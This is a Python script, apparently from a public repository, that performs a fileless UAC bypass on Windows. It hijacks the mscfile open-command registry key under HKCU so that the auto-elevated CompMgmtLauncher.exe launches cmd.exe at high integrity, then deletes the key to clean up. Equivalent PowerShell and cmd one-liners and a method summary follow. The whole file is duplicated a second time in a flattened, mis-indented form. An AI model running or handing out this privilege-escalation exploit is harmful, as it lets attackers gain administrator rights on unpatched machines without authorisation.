makelariss/uacbypasscompmgmtlauncher_exe.py

## uacbypasscompmgmtlauncher_exe.py
# -*- coding: utf-8 -*-
# All credits go to https://github.com/mrfuzzy8/Scripts/blob/master/Invoke-CompMgmtLauncherBypass.ps1 += https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'''
CompMgmtLauncher.exe is an auto-elevated binary that is vulnerable to Image Hijack on the .msc file extension.
Read access to HKCU\Software\Classes\mscfile\shell\open\command is perfomed with "mmc.exe" as a default value which then invokes eventvwr.msc,if “NAME NOT FOUND” it goes to HKCR\mscfile\shell\open\command.
Due to the registry key being accessible from user mode once we inject can inject an arbitray file to be executed with High IL.
'''

from _winreg import *
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
CreateKey(HKCU, 'Software\\Classes\\mscfile\\shell\\open\\command')
registrykey = OpenKey(HKCU, 'Software\\Classes\\mscfile\\shell\\open\\command', 0, KEY_WRITE)
print "Performing registry key manipulation"

SetValueEx(registrykey, '', 0, REG_SZ, 'C:\\Windows\\System32\\cmd.exe')
CloseKey(registrykey)
print "Setting payload"

from ctypes.wintypes import *
from ctypes import *
shell32  = WinDLL('shell32' ,  use_last_error=True)
kernel32 = WinDLL('kernel32',  use_last_error=True)


LPCTSTR = c_char_p
# Contains information used by ShellExecuteEx.
                                                              # https://msdn.microsoft.com/en-us/library/windows/desktop/bb759784(v=vs.85).aspx
class ShellExecuteInfo(Structure):                           # typedef struct _SHELLEXECUTEINFO
     _fields_ = [                                            # {
                 ('cbSize',                       DWORD),    # DWORD     cbSize;
                 ('fMask',                        ULONG),    # ULONG     fMask;
                 ('hwnd',                          HWND),    # HWND      hwnd;
                 ('lpVerb',                     LPCTSTR),    # LPCTSTR   lpVerb;
                 ('lpFile',                     LPCTSTR),    # LPCTSTR   lpFile;
                 ('lpParameters',               LPCTSTR),    # LPCTSTR   lpParameters;
                 ('lpDirectory',                LPCTSTR),    # LPCTSTR   lpDirectory;
                 ('nShow',                        c_int),    # int       nShow;
                 ('hInstApp',                 HINSTANCE),    # HINSTANCE hInstApp;
                 ('lpIDList',                    LPVOID),    # LPVOID    lpIDList;
                 ('lpClass',                      LPSTR),    # LPCTSTR   lpClass;
                 ('hKeyClass',                     HKEY),    # HKEY      hkeyClass;
                 ('dwHotKey',                     DWORD),    # DWORD     dwHotKey;
                 ('hIcon',                       HANDLE),    # union { HANDLE hIcon; HANDLE hMonitor;}
                 ('hProcess',                    HANDLE)     # HANDLE    hProcess;
                 ]                                           # }

PShellExecuteInfo = POINTER(ShellExecuteInfo)

ShellExecuteEx = shell32.ShellExecuteEx
ShellExecuteEx.restype = BOOL
ShellExecuteEx.argtypes = [
    PShellExecuteInfo
    ]

SW_HIDE = 0
SEE_MASK_NOCLOSEPROCESS = 0x00000040

ShellExecute = ShellExecuteInfo()
ShellExecute.cbSize = sizeof(ShellExecute)
ShellExecute.fMask = SEE_MASK_NOCLOSEPROCESS
ShellExecute.hwnd = None
ShellExecute.lpverb = None
ShellExecute.lpFile = u'CompMgmtLauncher.exe'
ShellExecute.lpParameters = None
ShellExecute.lpDirectory = None
ShellExecute.nShow = SW_HIDE
ShellExecuteEx(byref(ShellExecute))
kernel32.WaitForSingleObject(ShellExecute.hProcess, -1)
print "Triggering payload PID:", kernel32.GetProcessId(ShellExecute.hProcess)

DeleteKey(OpenKey(HKCU, 'Software\\Classes\\mscfile\\shell\\open', 0, KEY_ALL_ACCESS), 'command')
print "Deleting stuff"

'''
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\uknown> New-Item -Path "HKCU:\Software\Classes\mscfile\shell\open\command" -ErrorAction SilentlyContinue -Force | Out-Null
PS C:\Users\uknown> New-ItemProperty -Path "HKCU:\Software\Classes\mscfile\shell\open\command" -Name "(default)" -Value "C:\Windows\System32\cmd.exe" -Force | Out-Null
PS C:\Users\uknown> Start-Process CompMgmtLauncher.exe
PS C:\Users\uknown> Remove-Item -Path "HKCU:\Software\Classes\mscfile\shell\open\command" -ErrorAction SilentlyContinue -Force | Out-Null
'''

'''
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\uknown>reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f
'''

'''
25.
- Author: Enigma0x3
-    Type: Shell API
-    Method: Registry key manipulation
-    Target(s): \system32\EventVwr.exe, \system32\CompMgmtLauncher.exe
-    Component(s): Attacker defined
-    Implementation: ucmHijackShellCommandMethod
-    Works from: Windows 7 (7600)
-    Fixed in: Windows 10 RS2 (15031)
-        How: EventVwr.exe redesigned, CompMgmtLauncher.exe autoelevation removed
'''
	# -- coding: utf-8 --
	# All credits go to https://github.com/mrfuzzy8/Scripts/blob/master/Invoke-CompMgmtLauncherBypass.ps1 += https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
	'''
	CompMgmtLauncher.exe is an auto-elevated binary that is vulnerable to Image Hijack on the .msc file extension.
	Read access to HKCU\Software\Classes\mscfile\shell\open\command is perfomed with "mmc.exe" as a default value which then invokes eventvwr.msc,if “NAME NOT FOUND” it goes to HKCR\mscfile\shell\open\command.
	Due to the registry key being accessible from user mode once we inject can inject an arbitray file to be executed with High IL.
	'''

	from _winreg import *
	HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
	CreateKey(HKCU, 'Software\\Classes\\mscfile\\shell\\open\\command')
	registrykey = OpenKey(HKCU, 'Software\\Classes\\mscfile\\shell\\open\\command', 0, KEY_WRITE)
	print "Performing registry key manipulation"

	SetValueEx(registrykey, '', 0, REG_SZ, 'C:\\Windows\\System32\\cmd.exe')
	CloseKey(registrykey)
	print "Setting payload"

	from ctypes.wintypes import *
	from ctypes import *
	shell32 = WinDLL('shell32' , use_last_error=True)
	kernel32 = WinDLL('kernel32', use_last_error=True)


	LPCTSTR = c_char_p
	# Contains information used by ShellExecuteEx.
	# https://msdn.microsoft.com/en-us/library/windows/desktop/bb759784(v=vs.85).aspx
	class ShellExecuteInfo(Structure): # typedef struct _SHELLEXECUTEINFO
	_fields_ = [ # {
	('cbSize', DWORD), # DWORD cbSize;
	('fMask', ULONG), # ULONG fMask;
	('hwnd', HWND), # HWND hwnd;
	('lpVerb', LPCTSTR), # LPCTSTR lpVerb;
	('lpFile', LPCTSTR), # LPCTSTR lpFile;
	('lpParameters', LPCTSTR), # LPCTSTR lpParameters;
	('lpDirectory', LPCTSTR), # LPCTSTR lpDirectory;
	('nShow', c_int), # int nShow;
	('hInstApp', HINSTANCE), # HINSTANCE hInstApp;
	('lpIDList', LPVOID), # LPVOID lpIDList;
	('lpClass', LPSTR), # LPCTSTR lpClass;
	('hKeyClass', HKEY), # HKEY hkeyClass;
	('dwHotKey', DWORD), # DWORD dwHotKey;
	('hIcon', HANDLE), # union { HANDLE hIcon; HANDLE hMonitor;}
	('hProcess', HANDLE) # HANDLE hProcess;
	] # }

	PShellExecuteInfo = POINTER(ShellExecuteInfo)

	ShellExecuteEx = shell32.ShellExecuteEx
	ShellExecuteEx.restype = BOOL
	ShellExecuteEx.argtypes = [
	PShellExecuteInfo
	]

	SW_HIDE = 0
	SEE_MASK_NOCLOSEPROCESS = 0x00000040

	ShellExecute = ShellExecuteInfo()
	ShellExecute.cbSize = sizeof(ShellExecute)
	ShellExecute.fMask = SEE_MASK_NOCLOSEPROCESS
	ShellExecute.hwnd = None
	ShellExecute.lpverb = None
	ShellExecute.lpFile = u'CompMgmtLauncher.exe'
	ShellExecute.lpParameters = None
	ShellExecute.lpDirectory = None
	ShellExecute.nShow = SW_HIDE
	ShellExecuteEx(byref(ShellExecute))
	kernel32.WaitForSingleObject(ShellExecute.hProcess, -1)
	print "Triggering payload PID:", kernel32.GetProcessId(ShellExecute.hProcess)

	DeleteKey(OpenKey(HKCU, 'Software\\Classes\\mscfile\\shell\\open', 0, KEY_ALL_ACCESS), 'command')
	print "Deleting stuff"

	'''
	Windows PowerShell
	Copyright (C) Microsoft Corporation. All rights reserved.
	PS C:\Users\uknown> New-Item -Path "HKCU:\Software\Classes\mscfile\shell\open\command" -ErrorAction SilentlyContinue -Force \| Out-Null
	PS C:\Users\uknown> New-ItemProperty -Path "HKCU:\Software\Classes\mscfile\shell\open\command" -Name "(default)" -Value "C:\Windows\System32\cmd.exe" -Force \| Out-Null
	PS C:\Users\uknown> Start-Process CompMgmtLauncher.exe
	PS C:\Users\uknown> Remove-Item -Path "HKCU:\Software\Classes\mscfile\shell\open\command" -ErrorAction SilentlyContinue -Force \| Out-Null
	'''

	'''
	Microsoft Windows [Version 6.1.7601]
	Copyright (c) 2009 Microsoft Corporation. All rights reserved.
	C:\Users\uknown>reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f
	'''

	'''
	25.
	- Author: Enigma0x3
	- Type: Shell API
	- Method: Registry key manipulation
	- Target(s): \system32\EventVwr.exe, \system32\CompMgmtLauncher.exe
	- Component(s): Attacker defined
	- Implementation: ucmHijackShellCommandMethod
	- Works from: Windows 7 (7600)
	- Fixed in: Windows 10 RS2 (15031)
	- How: EventVwr.exe redesigned, CompMgmtLauncher.exe autoelevation removed
	'''